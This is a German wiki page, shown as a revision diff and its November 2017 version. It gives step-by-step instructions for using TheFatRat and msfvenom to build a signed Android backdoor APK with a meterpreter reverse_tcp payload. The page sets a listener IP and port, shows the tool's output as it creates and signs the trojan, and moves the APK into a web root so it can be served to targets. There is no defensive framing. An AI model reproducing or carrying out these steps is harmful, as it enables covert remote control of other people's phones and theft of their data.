Metasploit trojaner android fatrat: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=TheFatRat= ==Install== *git clone https://github.com/Screetsec/TheFatRat *cd TheFatRat *bash setup.sh ==Start== *./fatrat Datei:thefatrat2.png *5 *LHOST…“) |
Thomas (Diskussion | Beiträge) (→Start) |
||
| Zeile 6: | Zeile 6: | ||
==Start== | ==Start== | ||
*./fatrat | *./fatrat | ||
| − | [[Datei:thefatrat2.png]] | + | [[Datei:thefatrat2.png|500px]] |
| − | * | + | =Create Backdoor with msfvenom= |
| − | *LHOST | + | *Create Backdoor with msfvenom |
| − | *LPORT | + | **SIGNED ANDROID >> FatRat.apk |
| − | * | + | ***Set LHOST IP: 10.81.1.91 |
| + | ***Set LPORT: 7774 | ||
| + | ***Please enter the base name for output files : carlos | ||
| + | **android/meterpreter/reverse_tcp | ||
| + | =Resultat= | ||
| + | <pre> | ||
| + | Generate Backdoor | ||
| + | +------------++-------------------------++-----------------------+ | ||
| + | | Name || Descript || Your Input | ||
| + | +------------++-------------------------++-----------------------+ | ||
| + | | LHOST || The Listen Addres || 10.81.1.91 | ||
| + | | LPORT || The Listen Ports || 7774 | ||
| + | | OUTPUTNAME || The Filename output || carlos | ||
| + | | PAYLOAD || Payload To Be Used || android/meterpreter/reverse_tcp | ||
| + | +------------++-------------------------++-----------------------+ | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] | ||
| + | |||
| + | [*] Creating RAT payload with msfvenom | ||
| + | [✔] Done! | ||
| + | [*] Creating a Valid Certificate | ||
| + | [✔] Done! | ||
| + | [*] Signing your payload APK | ||
| + | [✔] Done! | ||
| + | |||
| + | Do you want to create a listener for this configuration | ||
| + | to use in msfconsole in future ? | ||
| + | </pre> | ||
| + | =apk auf den Host bringen= | ||
| + | *mv backdoored/carlos.apk /var/www/html/ | ||
| + | |||
| + | |||
| − | |||
*http://www.techroods.com/2017/04/hack-any-android-device-with-fatrat_1.html | *http://www.techroods.com/2017/04/hack-any-android-device-with-fatrat_1.html | ||
Version vom 11. November 2017, 13:18 Uhr
TheFatRat
Install
- git clone https://github.com/Screetsec/TheFatRat
- cd TheFatRat
- bash setup.sh
Start
- ./fatrat
Create Backdoor with msfvenom
- Create Backdoor with msfvenom
- SIGNED ANDROID >> FatRat.apk
- Set LHOST IP: 10.81.1.91
- Set LPORT: 7774
- Please enter the base name for output files : carlos
- android/meterpreter/reverse_tcp
- SIGNED ANDROID >> FatRat.apk
Resultat
Generate Backdoor +------------++-------------------------++-----------------------+ | Name || Descript || Your Input +------------++-------------------------++-----------------------+ | LHOST || The Listen Addres || 10.81.1.91 | LPORT || The Listen Ports || 7774 | OUTPUTNAME || The Filename output || carlos | PAYLOAD || Payload To Be Used || android/meterpreter/reverse_tcp +------------++-------------------------++-----------------------+ [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] [*] Creating RAT payload with msfvenom [✔] Done! [*] Creating a Valid Certificate [✔] Done! [*] Signing your payload APK [✔] Done! Do you want to create a listener for this configuration to use in msfconsole in future ?
apk auf den Host bringen
- mv backdoored/carlos.apk /var/www/html/